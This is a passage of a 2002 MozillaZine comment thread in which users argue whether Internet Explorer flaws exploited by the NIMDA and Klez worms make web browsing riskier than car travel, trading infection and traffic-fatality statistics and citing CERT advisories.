Despite all of that, and despite even SARC's primary labeling of NIMDA and W32.Klez as 'mass mailing worms' with payloads of 'large scale emailing' you expect me to think that the infections via web pages were significant relative to the infections via email even when you yourself admit you have no breakdown of the numbers. Yet I am, somehow, supposed to relinquish simple common sense, reasoning, and perceptional abilities and say to myself:

'Yep, a guy by the name of Subtle Rebel over at Mozillazine has determined that the infection via web page rate was 24% because that's his experience, and, of course, the folks at Mozillazine are in favor of this figure, too. Throw in a nice juicy 'expert' article from News.com and hey, I don't need a brain to think any more.'

Sorry, but I don't think that dog is going to hunt. ;)

#126 Re: Re: No

by asa <asa@mozilla.org>

Wednesday July 10th, 2002 7:06 PM

(until this thread gets bumped into the "older news" sidebar)

"The only thing you have demonstrated to me is that there hasn't been any significant type of worm/virus that was spread due to strictly web browsing. "

I see, because it spreads via email _and_ the web that means I haven't satisfied your criteria for a threat to web browsers. Nice logic.

--Asa

#127 Re: Re: Re: No

by kristen

Wednesday July 10th, 2002 7:37 PM

"I see, because it spreads via email _and_ the web that means I haven't satisfied your criteria for a threat to web browsers."

No, not at all. A worm/virus threat to a web surfer is not the same thing as the probability of a web surfer contracting a worm/virus via visiting a web page.

The 'nice logic' comes in with the rest of my prior post in its entirety. ;)

#128 Re: Re: No

by SubtleRebel <mark@ky.net>

Thursday July 11th, 2002 9:00 AM

"Yep, a guy by the name of Subtle Rebel over at Mozillazine has determined that the infection via web page rate was 24% because that's his experience, and, of course, the folks at Mozillazine are in favor of this figure, too."

You are misrepresenting what I said.

I explained how I determined that AT LEAST 24% of the NIMDA infections that I have dealt with were DEFINITELY NOT spread by email. I also stated that I could NOT determine the rate of infection via web page viewing because part of that 24% probably were not from web viewing and part of the other 76% probably were from web viewing; all that I can say for sure is that the 24% were not from email.

Ignoring facts presented is bad enough, but misrepresenting them is worse.

Also, your "simple math" is totally irrelevant. You said:

"Calculate, during the whole 1.2 million NIMDA accumulation period, the total number of web pages served to IE clients. Now get that number and divide it into the total number of infected web pages served IE clients for the same period. How about for the past 6 months? The past 2 years? 4 years?"

Even if someone could simply calculate the total number of web pages served, it has no bearing on the discussion. If you came up with a ratio between the number of web pages viewed by IE and the number of security compromises encountered then you would also have to calculate a ratio between the number of fatal car accidents and the total number of miles driven by everyone in the United States. Hardly simple math, but I'd be willing to bet that it would still show your claims to be invalid.

"Yet I am, somehow, supposed to relinquish simple common sense, reasoning, and perceptional abilities..."

It is rather obvious that you have already done that. You have your belief and you will continue to defend that belief despite common sense or reasoning, and to help in your defense you have chosen to disable any perceptive abilities that you might have and ignore the information that we have provided.

A logical argument consists of presenting facts and the logical implications of those facts. However you have not presented facts; instead you make claims based on your opinions, pose "rhetorical" questions that you do not want the real answers for, and make implications that you do not even attempt to give a basis for. There is no logic in an argument that continuously tries to redefine what the argument is about, but that is what you keep trying to do. There is no logic in an argument that misrepresents the opposing position in order to "prove" it wrong.

#129 Re: Re: Re: No

by kristen

Thursday July 11th, 2002 11:28 AM

"You are misrepresenting what I said. "

Not in the least.

"all that I can say for sure is that the 24% were not from email."

That is exactly correct, no arguments there at all. All you can say is that 24% were not from email. The operative word here being 'you'. I gave you, for argument's sake, the benefit that all 24% were from web browsing in your experience. I was being nice. ;) The point being that you can in no way, shape, or form extrapolate what 'you' encountered across that of hundreds of millions.

"Even if someone could simply calculate the total number of web pages served, it has no bearing on the discussion."

It has everything to do with the discussion. It has to do with the probability of a person acquiring a virus/worm via web browsing with IE. You, like several others here I am sure, like to believe it is a simple cut and dry matter, when in fact it is not. It is far from it.

What's kind of interesting is last night I was rummaging around through older topics here and in the mozillazine forum reading topics, posts, replies, etc. All in kind of an effort to get a better handle on what the different people here are like, their 'fundamental views' so to speak, or perhaps you could even call it their MO's, especially of the ones participating in this thread.

One thing that I found kind of interesting is in regards to Asa Dotzler. A mozilla.org member who, from what I can tell, has been around for at least a year, probably more, and seems to be well liked, intelligent, rational, and, of course, a mozilla advocate. What I have noticed is that Asa doesn't appear to me to be a 'loose lips' kind of a person when it comes to forums. I have been hard pressed to find a topic/forum thread where he has posted even four comments/replies, and as far as real trolls go, they have very little chance of getting a single reply. Back to the interesting thing, in a period spanning several days, Asa Dotzler has posted at least 20 comments to me that total well over 5,000 words. Quite astonishing for such a cut and dry issue, wouldn't you say? (Sorry, but that was another rhetorical question). ;)

All I can say to you really is that if it hasn't dawned on you yet why I or any other experienced IE user hasn't stopped using IE because of the likes of NIMDA and W32.Klez at least you have a few clues. I understand that the sheer simplicity of it all must be a total shocker for you, but take comfort in knowing that you are not alone and that there are others here who are with you. Often, in small circles, people can go on ranting and raving about something so much that it gets blown out of perspective to the point that they have lost grasp of what they are talking about. ;)

#130 Re: Re: Re: Re: No

by asa <asa@mozilla.org>

Thursday July 11th, 2002 5:45 PM

"I have been hard pressed to find a topic/forum thread where he has posted even four comments/replies"

It doesn't usually take more than a few posts :)

You still haven't responded to this:

you praised IE and the coming IE 7 for its feature set.

then arielb said: "is better security also coming soon in IE7? It sure is annoying having to download security updates all the time (especially since Windows update still doesn't support pause/resume)"

then you said: "I'm sure it will be even better. Then don't. What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck. Lots of false info out there on the wild wild web (www)."

_Every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_. 86,000 exploits in a single day, _all_ the result of an IE security hole. Even the exploits that came via email were still an attacker taking advantage of an IE security hole, not an Outlook security hole. The latest MS security fix for WMP is also a fix for the IE cache. Most of MS's security problems for networked PC users are IE exploits. You went on to change your language to something more along the lines of "being compromised while surfing the web" and I'm OK with the change in direction (and have done what I can to point out the literature that claims there are serious risks to web surfers) but it would be nice to hear you admit that your original statement to arielb, as quoted above, was very probably incorrect. That is, unless you want to tell me that 86,000 infections in a single day out of the 400 million web surfers worldwide is a lower frequency than the 110 or so people killed in car wrecks in a single day of the 170 million registered drivers in the US (I couldn't find worldwide registered drivers stats but I think it's safe to say there are probably another hundred million or two outside of the US).

--Asa

#131 Re: Re: Re: Re: Re: No

by kristen

Thursday July 11th, 2002 11:31 PM

"You still haven't responded to this:"

I have. Either you haven't read what I said or somehow just missed it. You keep comparing a number for a given day, such as 86,000, (a day or period that really feeds your security 'argument') and then you compare that to traffic fatalities for the same day/period. Finally, you turn around and say 'you see, you see, the statistics are terrible'.

The problem is that that type of reasoning is incorrect and that is what I have said at least twice already. What you need to do is look at the big picture here. It's kind of like someone saying that the chances of getting killed in a car wreck are higher than that of flying in a plane, and you saying 'no, wait, on 9/11/2001 600+ people were killed in a plane crash that day while only 110 were killed in a car wreck.' The logic in your statistical reasoning is fundamentally flawed. ;)

#132 Regardless, 86,000 in one day > 42,000 in a year

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 2:34 AM

You have not responded to Asa's point at all; if you truly believe that you have then you completely missed the point.

Asa provided a link to the documented fact that 42,000 people were killed during the course of a year. He also provided documentation showing that there were 86,000 NIMDA infections in a single day (and 1.2 million over the course of a few weeks).

Asa's statistical reasoning is not flawed at all; no matter how you look at it 86,000 is greater than 42,000. The fact that the 86,000 was just one day whereas the 42,000 was a whole year does not constitute a flaw.

Your reference to September 11 has no relevance; the problem with your comments there is that you are comparing statistics for a specific day that was an exception to the regular numbers. No one here has tried to compare the 86,000 to the number of fatal car wrecks on a specific day; it was compared to the number of fatalities for a whole year. It would take over 2 years for the number of auto accident fatalities to equal the number of people affected by NIMDA on that single day. It would take 30 years for the number of auto accident fatalities to add up to 1.2 million (which was the number of systems infected by NIMDA in a few weeks).

Just because you have said "that type of reasoning is incorrect" does not make it true. The facts are :

1) The number of people who travel in motor vehicles in a given day, week, month, or year is greater than the number of people who access the Internet using Microsoft products in the same time frame.

2) In the past year, more people had their computers infected with NIMDA than were killed in car accidents.

3) In the past x years, more people had their computers infected with NIMDA than were killed in car accidents.

4) If IE was not on anyone's computer during the past year, then no one would have been infected by NIMDA.

5) NIMDA is not the only exploit that has taken advantage of IE vulnerabilities.

#134 Re: Regardless, 86,000 in one day > 42,000 in a year

by kristen

Friday July 12th, 2002 4:32 AM

I'll sum it up for you real easy here. 86,000 in a day, 1.2 million in a couple of weeks. When compared to traffic deaths, your whole premise behind that is that those figures were a result of web browsing. You are heavily betting that because NIMDA could and did infect a web page that that is how and why it accumulated such a 'casualty' rate. You have no proof at all to show me that even 2% of that total was the result of web browsing.

Here's what I do know, though. I have seen other 'email only' virus/worms spread very rapidly, in a short period of time, even when a user was required to execute an attachment of the email. Simple common sense would dictate that something would spread even easier if a user didn't even have to execute an attachment. I also know that credible agencies such as SARC categorize both NIMDA and Klez as primarily 'mass mailing worms'.

As far as producing the number of web surfers to get a virus/worm via web surfing and comparing that to automobile fatality rates. You simply can't. There is, though, more than enough evidence to show how fast email viruses/worms spread, even when a user is required to execute an attachment. This is why I had repeatedly asked for any kind of significant data regarding virus/worms that were spread via web browsing only. The fact is, there isn't.

Another interesting thing during the course of reading the links posted here is the 'cost of viruses/worms'. Apparently, Asa didn't bother to read much of a link he provided, but it was still interesting, nonetheless:

<http://www.wired.com/news…ture/0,1377,49681,00.html>

This was kind of off topic, kind of not, but it was interesting to read in that article all of the 'experts' who find such cost estimates absurd, some even questioning what most of those things are beyond being a nuisance. Anyways, it was the end of the article that made me giggle a bit:

<start>

"We're starting to hear reports from people, stating that they know for a fact that their co-workers are opening viruses to get a 'vacation day.'" Erbschloe said sometimes it's a deliberate act of sabotage because employees hate their job, or they just want to knock the network offline so that they can relax for a day.

"That may explain why even the 'dumb viruses' are as effective as they are."

<end>

Back to the main issue. Here is the real clincher that you may want to digest for a bit. Now that the focus is on statistics regarding being killed in a car wreck several times over, for argument's sake, what if I had said 'being killed in an accident.'

I'm all ears. ;)

#136 Wrong again

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 9:40 AM

"When compared to traffic deaths, your whole premise behind that is that those figures were a result of web browsing."

No it is not. As Asa has explained more than once, the point is that those figures are all a result of a flaw in IE. Whether they were spread by web browsing or email, it was a flaw in IE that allowed the exploit to succeed.

"You have no proof at all to show me that even 2% of that total was the result of web browsing."

Well, you have given no proof of anything that you have claimed. Your 2% figure is pulled out of thin air and has no meaning whatsoever.

As I have pointed out, if as few as 3.6% of the 1.2 million NIMDA infections were the result of web browsing then the number of NIMDA infections would exceed the number of auto fatalities for the year. When you increase the timeframe to cover the entire year and to cover all IE exploits instead of just a few weeks of NIMDA, then the percentage required goes down. It is likely that only 2% of all IE exploits for the year would exceed the number of auto fatalities.

Based on my personal experiences of dealing with NIMDA infected computers, servers, and websites, and based on all the articles that I have read, and all of the online discussions that I have been a part of, the evidence seems to indicate that the number of NIMDA infections from viewing web pages is well above 3.6% of the total. You have presented absolutely nothing that indicates otherwise. Can you provide a link showing where SARC or any other reputable agency indicates that web browsing constitutes a lesser percentage?

Regardless though, the point still is that 100% of the infections, via web or via email, are the result of an IE security hole. Without IE on the computer, you would be safe from NIMDA, Klez, and all of the other exploits that tuxracer presented.

"This was kind of off topic, kind of not, but it was interesting to read in that article all of the 'experts' who find such cost estimates absurd, some even questioning what most of those things are beyond being a nuisance."

The cost is undoubtedly off topic and is totally irrelevant. However, anyone suggesting that virii/worms are just a nuisance is a moron.

"Now that the focus is on statistics regarding being killed in a car wreck several times over, for arguments sake, what if I had said 'being killed in an accident.'"

I would say that once again you are trying to change the point of the discussion. You made a claim and it was invalid; you can not validate yourself by trying to change what you said.

#138 Re: Wrong again

by kristen

Friday July 12th, 2002 10:57 AM

"As Asa has explained more than once, the point is that those figures are all a result of a flaw in IE. Whether they were spread by web browsing or email, it was a flaw in IE that allowed the exploit to succeed."

Thank you, Subtle Rebel, for re-outlining, yet again, something that Asa said. I'm afraid that you are the one who is missing the point and you're doing a good job of demonstrating how poor your reading skills are. The probability of contracting a virus/worm via a web page has everything to do with what I am saying. You see, I don't use Outlook Express for my email. I have it, but I don't use it. I have always used Netscape Messenger 4.X (currently 4.79) for my email. Truth be told, it has nothing to do with security either. I use it because I like the look/feel of it, the fact that I don't need to have Microsoft Office installed to have spell checking capability, a nice mail notification utility, and a decent newsreader that doesn't mangle posts I make to a newsgroup, amongst other things. Multiple pop accounts? I could care less, I have never personally had a need for more than one. I do, however, like IE and it is my default browser. I don't like Mozilla (sorry) and I like Mozilla Mail/News even less (not sorry) ;). I'm not about to get into a debate as to why (especially here) for that is an entirely separate issue. The point is, and one that you so far consistently miss despite me repeating it umpteen times, is that web browsing security is exactly the point.

"Well, you have given no proof of anything that you have claimed. Your 2% figure is pulled out of thin air and has no meaning whatsoever."

That's right, I did pull the 2% figure out of thin air. Here's another figure I'm going to pull out of thin air: You have no proof at all to show me that even 1% of that total was the result of web browsing. ;)

"As I have pointed out" (and all the rest)

You have pointed two things out to me. One being that you cannot read. The other being that you cannot read.

"I would say that once again you are trying to change the point of the discussion"

Somehow I kind of figured you would say something like that. Getting killed in an accident is irrelevant to the fundamental point being made here, getting killed several times over in a car wreck is the decisive factor. ;)

#141 Missed the point again

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 10:56 PM

"Thank you, Subtle Rebel, for re-outlining, yet again, something that Asa said. ...[irrelevant stuff deleted] .... The probability of contracting a virus/worm via a web page has everything to do with what I am saying. ...[a whole lot more irrelevant stuff deleted] ... is that web browsing security is exactly the point. "

Regardless of how many times it is presented, you have missed the point that Asa asked you to respond to.

Regardless of what you are saying about contracting a virus/worm via a web page, those comments do not respond to the point that Asa made. Asa's point was that email infections are a result of IE flaws, and that telling someone that they do not need to worry about patching holes in IE security is very bad advice.

Whether or not you personally use Outlook is irrelevant to the discussion because it is not just about your personal chances of getting killed in a car wreck. We are talking about statistics regarding everyone who uses IE.

#143 Re: Re: Wrong again

by asa <asa@mozilla.org>

Friday July 12th, 2002 11:39 PM

"The probability of contracting a virus/worm via a web page has everything to do with what I am saying."

And you're changing your argument in the middle of the debate. What happened to your original claim? You said: "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck." You said nothing about browsing the web.

I'm guessing that after you were educated (by some mozillazine posts, and undoubtedly by your own research) you realized that the original argument was unwinnable so you changed your claims.

Or am I reading you wrong and you still stand by your original claim?

--Asa

#144 Re: Re: Re: Wrong again

by kristen

Saturday July 13th, 2002 3:15 AM

"You said nothing about browsing the web."

Asa, you know as well as I that I did make that clear long long ago. Several days ago, in fact. ;)

"Or am I reading you wrong and you still stand by your original claim?"

I stand by the point that I have made. My style is common practice in the legal profession. Assert high, ask to understand, speak to be understood, then, finally, deliver the reality.

All that is left for you, or anyone else here, to do is to differentiate between a person's decision making when the risk to them is either getting killed in an accident, or in that of a car wreck several times over. ;)

#146 Legal profession

by SubtleRebel <mark@ky.net>

Saturday July 13th, 2002 10:51 AM

I agree that your tactics are common in the legal profession, but aligning yourself with the legal profession really does not enhance your credibility.

It is common in the legal profession to distort reality in order to try to convince the jury to side with you.

It is common in the legal profession to misrepresent the facts and to try to twist quotes out of context in order to make it seem like the person said something different than what they actually said.

Those in the legal profession seldom use actual logic.

The legal profession ceased to be about truth and justice a long time ago; it is now about winning at any cost through manipulation and loopholes.

Unfortunately for you, this forum is more educated about the real facts of the case than a typical jury and so your tactics are not very effective here.

#149 Re: Re: Re: Re: Wrong again

by asa <asa@mozilla.org>

Saturday July 13th, 2002 12:02 PM

I didn't ask you if you stand by the point you made. I asked you if you stand by the statement you made which I quoted and which started this whole thread. Do you stand by this statement "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck." If you do then just say so. If you don't then say so.

--Asa

#153 Re: Re: Re: Re: Re: Wrong again

by kristen

Monday July 15th, 2002 11:25 AM

"I didn't ask you if you stand by the point you made."

Thank you, for acknowledging the point I made. ;)

#156 More of the same

by SubtleRebel <mark@ky.net>

Monday July 15th, 2002 3:02 PM

Still taking quotes out of context in order to try to misrepresent what was said? Do you not realize how lame that is?

Anyway, making a point is not necessarily the same as making a valid point.

BTW, I also notice that once again you failed to respond to Asa's question.

#142 Re: Re: Regardless, 86,000 in one day > 42,000 in

by asa <asa@mozilla.org>

Friday July 12th, 2002 11:32 PM

"When compared to traffic deaths, your whole premise behind that is that those figures were a result of web browsing. "

Wrong. Not "a result of web browsing". You're again trying to change the whole discussion.

You said: "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck."

And I'll repeat _Every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_.

How about you admit that your original statement doesn't hold water or tell me that you still stand by your original claim as quoted above.

--Asa

#145 Re: Re: Re: Regardless, 86,000 in one day > 42,000 in

by kristen

Saturday July 13th, 2002 9:54 AM

"Wrong. Not "a result of web browsing". You're again trying to change the whole discussion."

I'm afraid that you are the one who is wrong and I'm disappointed to see that you are now starting to sound like that other guy.

Since my first post following what you just quoted, which was Friday, July 5th, 2002 at 08:24:38 PM my assertion was made quite clear:

'I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/her heart's content without being 'compromised' in the least'

That was over a week ago. What had happened, in case you have forgotten, was the topic was shifting more and more to email (I wonder why) of which I later got things back on track.

"And I'll repeat _Every_ NIMDA exploit of a user's PC was the result of _an_ _IE_ _security_ _hole_. "

Now you are sounding like that other guy who entered the discussion late, thinking he had a clue as to what was going on.

"How about you admit that your original statement doesn't hold water or tell me that you still stand by your original claim as quoted above."

When someone starts tearing apart a statement in lieu of the point, I know they are getting desperate. The irony is, after all of this, that I don't really know if a person is more than likely to get killed in a car wreck several times over versus their system being compromised by browsing the web. The data presented has been interesting, but still nothing conclusive because it all rests on speculation via the likes of Klez and NIMDA vis-à-vis email propagation. What I do know in regards to the point that I have made, is that a person is more than likely to get killed than have their system compromised via web browsing with IE. The ultimate point being that the 'safer browsing with mozilla' argument is a very weak sales pitch.

In case you have been wondering why the world isn't knocking on the lizard's door in the name of 'securer browsing' at least now you know. Whether you, or any other mozilla advocate/user/devotee, care to come to terms with this reality is more of a spiritual issue than anything else. I can't help you there. :(

Good day, gentlemen. ;)

#147 Re: Re: Re: Re: Regardless, 86,000 in one day > 42

by SubtleRebel <mark@ky.net>

Saturday July 13th, 2002 10:58 AM

"That was over a week ago. What had happened, in case you have forgotten, was the topic was shifting more and more to email (I wonder why) of which I later got things back on track."

You wonder why the topic was shifting? It was because you were trying to shift it; we were trying to keep it on track the whole time.

If you would care to actually read the posts, it was you who kept bringing up email. It was you who kept trying to bring Melissa and ILOVEYOU into the discussion when they had no relevance. It was you who kept trying to ignore tuxracer's list of IE exploits that have NOTHING to do with email. It was you who continuously ignored the fact that NIMDA and Klez are the result of an IE flaw.

#148 Contradicting yourself or changing topic again?

by SubtleRebel <mark@ky.net>

Saturday July 13th, 2002 11:07 AM

The following two quotes are from the same paragraph of your above post:

"The irony is, after all of this, that I don't really know if a person is more than likely to get killed in a car wreck several times over versus their system being compromised by browsing the web."

"What I do know in regards to the point that I have made, is that a person is more than likely to get killed than have their system compromised via web browsing with IE."

Are you contradicting yourself, or are you changing your argument so that it covers being killed under any circumstances?

Maybe you should change it to "a person is more likely to die than to be compromised by browsing the web" because I am sure we would all agree to that.

#150 Re: Re: Re: Re: Regardless, 86,000 in one day > 42

by asa <asa@mozilla.org>

Saturday July 13th, 2002 12:10 PM

"I assert that arielb could install the original Windows98 with an entirely unpatched IE4 and browse to his/her heart's content without being 'compromised' in the least"

But arielb would be compromised. There are any number of ways that arielb would be compromised including NIMDA. That you don't understand this is getting tiresome. Arielb could be compromised by the simple act of browsing the web, by using Outlook, Outlook Express or Windows Media Player. All of these potential exploits are the fault of security flaws in IE.

Your first quote following the one I posted was the beginning of your shifting your argument to something a little less doomed. I'm still curious if you stand by the statement you made which started this entire thread. You started this thread with an assertion which is patently false and you're running away from it. I'm OK with you abandoning that silly assertion and moving back to other threads. A simple "I was wrong in my original assertion but the rest of what I said I still stand by" will do.

In case you want to read it again while you ponder your answer: "What the 'IE security bashers' don't tell you is that the probability of your computer being compromised because of an 'IE security hole' is less than you getting killed (several times over) in a car wreck."

--Asa

#154 Re: Re: Re: Re: Re: Regardless, 86,000 in one day > 42

by kristen

Monday July 15th, 2002 11:33 AM

"But arielb would be compromised. There are any number of ways that arielb would be compromised including NIMDA."

Your use of the word 'would' has more holes than a 10 pound block of Swiss cheese. Better phrased 'it is possible that arielb could encounter a web page that compromises his/her security, but he/she is more likely to get killed first'

Now we have two phrases to pick at. Getting killed in a car wreck several times over, and the number of holes in a 10 pound block of Swiss cheese. ;)

#157 Do you understand "context" ??

by SubtleRebel <mark@ky.net>

Monday July 15th, 2002 3:09 PM

Why do you insist on taking quotes out of context and then trying to dissect them? Are you just incapable of arguing based on the actual issue?

Oh yeah, that's right, if you actually tried to argue the merits of your position, you would have nothing to say.

#133 Re: Re: Re: Re: No

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 2:40 AM

> "You are misrepresenting what I said. "

> Not in the least.

Give me a break. You stated "...Subtle Rebel over at Mozillazine has determined that the infection via web page rate was 24% because that's his experience..." That is a misrepresentation of what I said. Period.

#135 Re: Re: Re: Re: Re: No

by kristen

Friday July 12th, 2002 6:15 AM

"Give me a break."

I thought I did.

Perhaps I should have said 100% given the subject of your just prior post: 'Regardless, 86,000 in one day > 42,000 in a year' ;)

#137 Huh?

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 9:58 AM

Huh?

Are you claiming that you gave me a break because you did not lie as much as you could have?

You twisted what the 24% represented in my earlier post, but now you are suggesting that you should have misquoted me further by changing the percentage value itself?

Why not just debate what I actually said instead of trying to make up things? I know it is easier for you to disprove the stuff that you make up, but when the whole thread is here for people to read, they can easily see what you are doing and it really makes you look bad.

#139 Re: Huh?

by kristen

Friday July 12th, 2002 11:03 AM

I am really kind of wishing I followed my earlier suspicion that you are well worth ignoring.

#140 Choices

by SubtleRebel <mark@ky.net>

Friday July 12th, 2002 10:42 PM

I'd rather have you ignore my posts than have you keep trying to make it sound like I said something different than what I have said.

#114 NIMDA does not require email

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 12:58 AM

As I pointed out in detail in previous posts ( <http://www.mozillazine.or…=2329&message=103#103> ) and ( <http://www.mozillazine.or…=2329&message=104#104> ), I have personally dealt with major infections of NIMDA that have no connection whatsoever to email.

It is a mistake to think that NIMDA is only spread by email; I am inclined to believe that email is not even the primary method by which NIMDA is spread. As I have stated before, due to user ignorance, it is virtually impossible to determine the primary means by which it is spread. The only thing that we know for certain is that using Mozilla for email and web browsing will protect your workstation from being damaged from any of the IE and Outlook exploits.

#113 This is getting absurd

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 12:42 AM

> Actually, you haven't. All you, and others, have done are cite examples that involved email in one form or another. Everything that has been cited is first described by SARC as 'mass mailing worms' who have payloads of 'large scale emailing'.

That is pure BULL.

In addition to NIMDA and Klez which are spread via web browsing (email involvement is NOT required), there have also been various examples of IE exploits that have absolutely nothing to do with email.

Either you have not been paying any attention to the posts and links provided, or you are intentionally ignoring them; in either case, the information has been repeated often enough.

> We all know the devastation of email worms such as Melissa and ILOVEYOU even though they required the user to execute an attachment. Now imagine the consequences of something that only requires a person to view the email.

IIRC, you are the only one who has ever mentioned Melissa or ILOVEYOU in this thread. Everyone else has been giving you examples of virii/worms/exploits that can be triggered by simply viewing a web page or alternately by simply viewing an email.

NIMDA and Klez are both widespread examples of the consequences of something that only requires a person to view and does not require the user to execute anything other than their Microsoft software.

If you continue to persist in your blind ignorance then so be it, but we have provided more than enough evidence to refute your claims in the eyes of any sane person.

#116 Re: This is getting absurd

by kristen

Wednesday July 10th, 2002 1:24 AM

"If you continue to persist in your blind ignorance then so be it"

Have you noticed yet that I'm ignoring you?

#118 Ignoring

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 3:25 AM

>"If you continue to persist in your blind ignorance then so be it"

>Have you noticed yet that I'm ignoring you?

Well, I had noticed that you were ignoring the facts, but I could not be sure whether or not you were specifically ignoring me because you also seem to be ignoring the facts presented by tuxracer and Asa and others.

Also, you can not be ignoring me totally if you are replying to some of my posts.

Lastly, the fact that you have now admitted that you have attempted to ignore the information that has been presented only serves to prove that you are indeed intentionally trying to hold on to your ignorance. That being the case, further discussion is a waste of time.

#119 Re: Ignoring

by kristen

Wednesday July 10th, 2002 4:23 AM

Ya know, there really isn't any need to be so abrasive. If you would have taken the time to follow your own advice and read this thread yourself, rather than accusing me of not knowing the facts, you would see that I already know that 'NIMDA does not require email'.

All you and tuxracer have done is repeat what I already know, with links to pages I have already read (including links that link to another post within this same thread). This was my reason for not replying to tuxracer and most of the reason I didn't reply to you (I've sensed somewhat of an obnoxious 'air' to you that I really don't want to waste my time with, sorry :( ).

I guess that's all I really have to say to you. At least I'm not ignoring you in this specific instance. ;)

#120 Re: Re: Ignoring

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 4:38 AM

> rather than accusing me of not knowing the facts, you would see that I already know that 'NIMDA does not require email'.

If you already know the facts then why do you keep denying them?

You have stated more than once that no one has posted about any non-email related threat; that is blatantly untrue.

> I've sensed somewhat of an obnoxious 'air' to you that I really don't want to waste my time with, sorry :(

Hmmm, interesting.

It was specifically because of your obnoxious 'air' that I felt compelled to enter into this discussion in the first place.

#121 Offtopic : MozillaZine reformatting text

by SubtleRebel <mark@ky.net>

Wednesday July 10th, 2002 4:43 AM

Can anything be done to prevent carriage returns from being ignored in these Talkback posts? It does not seem to be particularly consistent, but it does happen rather frequently here. I have not really noticed it happening in the forums section though which apparently uses different code.

#125 Re: Offtopic : MozillaZine reformatting text

by AlexBishop <alex@mozillazine.org>

Wednesday July 10th, 2002 6:07 PM

"Can anything be done to prevent carriage returns from being ignored in these Talkback posts?"

There's no way to get a single line break in a post. However, you can start a new paragraph by using two carriage returns.

"I have not really noticed it happening in the forums section though which apparently uses different code."

The Talkback Forums are powered by Phorum. The article Talkback system was custom-written by Chris.

Alex

#122 Re: Re: Re: Ignoring

by kristen

Wednesday July 10th, 2002 5:00 AM

"If you already know the facts then why do you keep denying them?"

I haven't. It is the interpretation of the facts where the disagreement lies.

"You have stated more than once that no one has posted about any non-email related threat; that is blatantly untrue."

Someone hasn't been reading. ;)

#104 Are you paying attention?

by SubtleRebel <mark@ky.net>

Tuesday July 9th, 2002 4:23 AM

> "You are indeed very silly (perhaps another word would be better) if you honestly believe that the fact that we have not produced a list of sites that compromise your security"
>
> I guess I'm silly. ;) What has not been produced are cases of widespread security issues involving web browsing.

NIMDA and Klez are both spread via web browsing with IE; you do not have to use Outlook in order to get infected. I have seen several cases where the infected user was using Lotus Notes for their email and IE for web browsing. How do you propose that these people were infected? (remember now, it is not possible to get infected via Lotus Notes.)

tuxracer provided you with several links to websites detailing various IE vulnerabilities; the majority of these involve IE only exploits and have nothing to do with email. You claim that you have little chance of encountering one of these exploits, but you have nothing to base that claim on. Would you even know it if you were exploited? How would you know? The average user most certainly would have no clue and would have no way to trace their problems back to a website.

#89 Re: tuxracer's comparison

by tuxracer

Monday July 8th, 2002 11:25 AM

"No one has said a single thing to refute this. I'll give you a hint as to why -> Because you can't. ;)"

Uh... <http://www.mozillazine.or…le=2329&message=45#45>

#57 Re: Re: Re: Re: Re: Re: Not my experience

by niner

Sunday July 7th, 2002 3:35 AM

"Not only can no one provide any real-world information regarding websites exploiting IE security holes to compromise a users system, the best that can be had so far is some obscure 'exploit' that sounds like the most dangerous and effective thing in the world yet is reported nowhere, other than the same initial 'report' being quoted several times over."

Am I wrong or did Nimda do exactly that? It didn't require you to start anything. Just opening an infected mail in Outlook or _visiting an infected website_ was enough to get the virus. It spread all over the world and still exists and pops up here and there.

Btw. you think only Mozilla advocates are so serious about security? That's interesting, because even Microsoft did admit this February that their products need a security overhaul and announced this great new security strategy. Do you think that Bill Gates is a new Mozilla advocate?

#68 Re: Re: Re: Re: Re: Re: Not my experience

by SubtleRebel <mark@ky.net>

Sunday July 7th, 2002 12:16 PM

First of all, Klez (<http://www.kb.cert.org/vuls/id/980499>) and Nimda (<http://www.cert.org/advisories/CA-2001-26.html>) are both triggered by simply viewing/previewing an email with Outlook or viewing a web page with IE. It is not necessary for the user to click on anything or execute any attachment. These threats did indeed top the charts left and right.

Also MS IE's buffer overrun vulnerability (<http://www.cert.org/advisories/CA-2002-04.html>) is triggered by simply viewing a web page.

As for Help.Dropper, it is just an example of the recently discovered flaw. It is rather naive to think that you would find an exploit in the wild by doing a search for Help.Dropper in Google. Anyone maliciously using that method would be stupid to advertise it by referencing the name Help.Dropper in their code or on their website. Also due to how this vulnerability works, most users would not be likely to trace an infection back to the source. The sample given does not show itself until you reboot the computer, so why would users think that it was related to an email or webpage that they had viewed sometime during a previous Internet session?

#75 Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 5:35 PM

Ok, tell you what, to all ->

<kristen_m@prodigy.net>

WinXP Pro, NTFS, IE6/OE6

Bomb away. ;)

#77 Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by asa <asa@mozilla.org>

Sunday July 7th, 2002 8:09 PM

We're the good guys. We don't attack users ;-)

Do you run any anti-virus software or a personal firewall? Has it ever located any virus or intrusion on your machine? Do you know anyone that has ever had a virus on his/her machine? If your answer to these questions is no then you're in the extreme minority.

--Asa

#80 Re: Re: Re: Re: Re: Re: Re: Re: Re: Not my experience

by kristen

Sunday July 7th, 2002 8:41 PM

"We're the good guys. We don't attack users ;-)"

By all means please make your point. ;)

"Do you run any anti-virus software or a personal firewall?"

Yes.

"Has it ever located any virus or intrusion on your machine?"

Yes.

"Do you know anyone that has ever had a virus on his/her machine?"

Yes.

Did any of this occur via viewing a web page or simply opening an email? No. Back at you: "If your answer to these questions is yes then you're in the extreme minority." ;)

